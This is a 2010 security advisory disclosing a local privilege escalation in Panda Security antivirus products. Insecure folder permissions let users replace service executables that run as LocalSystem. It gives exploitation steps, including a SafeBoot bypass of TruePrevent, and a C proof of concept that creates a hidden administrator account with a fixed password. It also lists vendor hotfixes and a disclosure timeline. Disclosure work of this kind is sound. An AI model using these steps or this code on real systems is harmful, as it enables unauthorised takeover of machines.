______________________________________________ Security Advisory NSOADV-2010-001 (Version 2) ______________________________________________ ______________________________________________ Title: Panda Security Local Privilege Escalation Severity: Medium Advisory ID: NSOADV-2010-001 Found Date: 02.2008 Date Reported: 30.11.2009 Release Date: 09.01.2010 Update Date: 20.01.2010 Author: Nikolas Sotiriu (lofi) Website: http://sotiriu.de Mail: nso-research at sotiriu.de URL: http://sotiriu.de/adv/NSOADV-2010-001.txt Vendor: Panda Security (http://www.pandasecurity.com/) Affected Products: (Self tested) -Panda Security for Business 4.04.10 -Panda Security for Business with Exchange 4.04.10 -Panda Security for Enterprise 4.04.10 -Panda Internet Security 2010 (15.01.00) -Panda Global Protection 2010 (3.01.00) -Panda Antivirus Pro 2010 (9.01.00) -Panda Antivirus for Netbooks (9.01.00) (Provided by Panda) -Panda Global Protection 2009 -Panda Internet Security 2009 -Panda Antivirus Pro 2009 -Panda Internet Security 2008 -Panda Antivirus + Firewall 2008 -Panda Platinum 2007 Internet Security -Panda Platinum 2006 Internet Security Affected Component: Corporate Products: -Panda Security for Desktops 4.05.10 -Panda Security for File Servers 8.04.10 Remote Exploitable: No Local Exploitable: Yes Patch Status: Vendor released a patch (See Solution) Discovered by: Nikolas Sotiriu Disclosure Policy: http://sotiriu.de/policy.html Thanks to: Thierry Zoller: For the permission to use his Policy Background: =========== Panda Security for is the security solution for companies that need to protect their networks, mainly workstations and file servers. Panda Security for Business is centrally managed thanks to the AdminSecure Console, which allows monitoring the entire network, protecting your critical assets against all types of threats and optimizing productivity. (Product description from Panda Website) This vulnerability is similar to the following vulnerabilities in Panda products, which where discovered earlier: Sep 07 2006 3APA3A: http://www.securityfocus.com/bid/19891 Aug 02 2007 tarkus: http://www.securityfocus.com/bid/25186 Oct 31 2009 Protek: http://www.securityfocus.com/archive/1/507615 Nov 02 2009 Maxim: http://www.securityfocus.com/bid/36897 The earlier reported vulnerabilities only affected the Home user products. But the business products had the same bug. More interesting is, that Panda failed since 2006 each year by releasing the new version with the same old bug. Description: ============ 1. 32Bit Version of Panda Security for Desktops/File Servers +----------------------------------------------------------- During installation of Panda Security for Desktops/File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. The 32bit Version of Panda Security for Desktops/File Servers installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +------------------------------ %ProgramFiles%\PANDA SOFTWARE\AVTC\PSKMsSvc.exe (Desktop only) %ProgramFiles%\PANDA SOFTWARE\AVTC\PavSrv51.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PavFnSvr.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PSHost.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsImSvc.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\PsCtrlS.exe %ProgramFiles%\PANDA SOFTWARE\AVTC\TPSrv.exe 2. 64Bit Version of Panda Security for Desktops/File Servers +----------------------------------------------------------- During installation of Panda Security for Desktops/File Servers the permissions for installation folder %ProgramFiles%\Panda Software\AVTC\ by default are set to Everyone:Full Control. Few services (e.g. PavSrvx86.EXE) are started from this folder. Services are started under LocalSystem account. In the 64bit Version of Panda Security for Desktops/File Servers is no TruePrevent package available, which protects the files in the installation directory from manipulation. There is no protection of service files. It's possible for unprivileged user to replace service executable with the file of his choice to get full access with LocalSystem privileges. This can be exploited by: a. Rename PavSrvX86.exe to PavSrvX86.old in Panda folder b. Copy any application to PavSrvX86.exe c. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +------------------------------ C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PavSrvX86.exe C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsImSvc.exe C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PskSvc.exe C:\Program Files (x86)\PANDA SOFTWARE\AVNT\PsCtrlS.exe 3. Panda Internet Security/Global Protection/Antivirus Pro 20XX +----------------------------------------------------------------------- During installation of the Panda Security 20XX Products the permissions for installation folder %ProgramFiles%\panda security\panda \ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. This products installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. Executable started as services: +------------------------------ %ProgramFiles%\panda security\panda \firewall\PSHOST.EXE %ProgramFiles%\Panda Security\Panda \PavFnSvr.exe %ProgramFiles%\Panda Security\Panda \PsImSvc.exe %ProgramFiles%\Panda Security\Panda \pavsrv51.exe %ProgramFiles%\Panda Security\Panda \PskSvc.exe %ProgramFiles%\Panda Security\Panda \PsCtrls.exe %ProgramFiles%\Panda Security\Panda \TPSrv.exe 4. Panda Antivirus for Netbooks +------------------------------ During installation of the Panda Antivirus for Netbooks the permissions for installation folder %ProgramFiles%\panda security\Panda Antivirus for Netbooks\ by default are set to Everyone:Full Control. Few services (e.g. PAVSRV51.EXE) are started from this folder. Services are started under LocalSystem account. This product installs the TruePrevent package by default, which protects the files in the installation directory from manipulation. If the TruePrevent Service (Panda TPSrv) is not running the files are completely unprotected. A normal user is not able to stop the service, but normally he can boot his workstation in SafeBoot mode, in which the TPSrv is not started and all services files can be manipulated. This can be exploited by: a. Boot the PC in SafeBoot mode, by pressing F8 during the boot process b. Rename PAVSRV51.exe to PAVSRV51.old in Panda folder c. Copy any application to PAVSRV51.exe d. Reboot Upon reboot trojaned application will be executed with LocalSystem account. This product was not patched like the other 2010 products, so the the following vulnerability already exists: http://www.securityfocus.com/bid/36897 TruePrevent bypass: It can be bypassed using "Open" dialog in "Quarantine" -> Add file" functionality. Executable started as services: +------------------------------ %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PavFnSvr.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsImSvc.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\pavsrv51.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PskSvc.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\PsCtrls.exe %ProgramFiles%\Panda Security\Panda Antivirus for Netbooks\TPSrv.exe Proof of Concept : ================== #include #include INT main( VOID ) { CHAR szWinDir[ _MAX_PATH ]; CHAR szCmdLine[ _MAX_PATH ]; GetEnvironmentVariable( "WINDIR", szWinDir, _MAX_PATH ); printf( "Creating user \"owner\" with password \"PandaOWner123\"...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe user owner PandaOWner123 /add", szWinDir ); system( szCmdLine ); printf( "Adding user \"owner\" to the local Administrators group...\n" ); wsprintf( szCmdLine, "%s\\system32\\net.exe localgroup Administrators owner /add", szWinDir ); system( szCmdLine ); return 0; } Solution: ========= Home User Products: +------------------ Panda Advisory http://www.pandasecurity.com/homeusers/support/card?id=80173&idIdioma=2 Panda Global Protection 2010 Hotfix http://www.pandasecurity.com/resources/sop/PGP10/hfgp30906s22_r4.exe Panda Internet Security 2010 Hotfix http://www.pandasecurity.com/resources/sop/PIS10/hfp150906s25_r1.exe Panda Antivirus Pro 2010 Hotfix http://www.pandasecurity.com/resources/sop/PAVPro10/hft90906s21_r1.exe Business Products: +----------------- Panda Advisory http://www.pandasecurity.com/enterprise/support/card?id=40061&idIdioma=2 32Bit Version of Panda Security for Desktops/File Servers Hotfix http://www.pandasecurity.com/resources/sop/AS0404/CSS_x86_SecurityFix.exe 64Bit Version of Panda Security for Desktops/File Servers Hotfix http://www.pandasecurity.com/resources/sop/AS0404/CSS_x64_SecurityFix.exe Disclosure Timeline (YYYY/MM/DD): ================================= 2008.02.??: Vulnerability found 2008.02.??: Reported to Vendor (no response) 2009.11.28: Tested the current versions and update this advisory 2009.11.30: Asked vendor for a PGP Key 2009.11.30: Vendor sent PGP Key 2009.11.30: Sent PoC, Advisory, Disclosure policy and planned disclosure date (2009.12.17) to Vendor 2009.11.30: Vendor acknowledges the reception of the advisory 2009.12.15: Ask for a status update, because the planned release date is 2009.12.17. 2009.12.15: Panda Security Response Team informs me that they are working on a fix and will give me a hotfix publishing date tomorrow. 2009.12.16: Panda Security Response Team informs me that they need a few more days to prepare the Hotfix publishing. 2009.12.17: Changed release date to 2009.12.23. 2009.12.21: Asked for a list of affected products 2009.12.21: Got a list with affected products and a the wish to delay the release to the 2009.12.24. 2009.12.21: Changed release date to 2009.12.24. 2009.12.23: Asked for a list of affected products for the corporate suites which was not part of the previously provides list. [No response] 2010.01.04: Ask for a status update, because there is no advisory published and i didn't got a response to my last mail. 2010.01.05: Panda send me the Link to there advisory (Home User Products) 2010.01.05: Asked if the corporate products are patched. [No response] 2010.01.07: Informed Panda, that i will release the Advisory on 2010.01.08 [No response] 2010.01.09: Release of Advisory draft Version 1 2010.01.11: Panda Security Response Team informs me that they didn't published a Hotfix for the Corporate Products. 2010.01.20: Panda published the Advisory and Hotfix for the Corporate Products 2010.01.20: Release of Advisory draft Version 2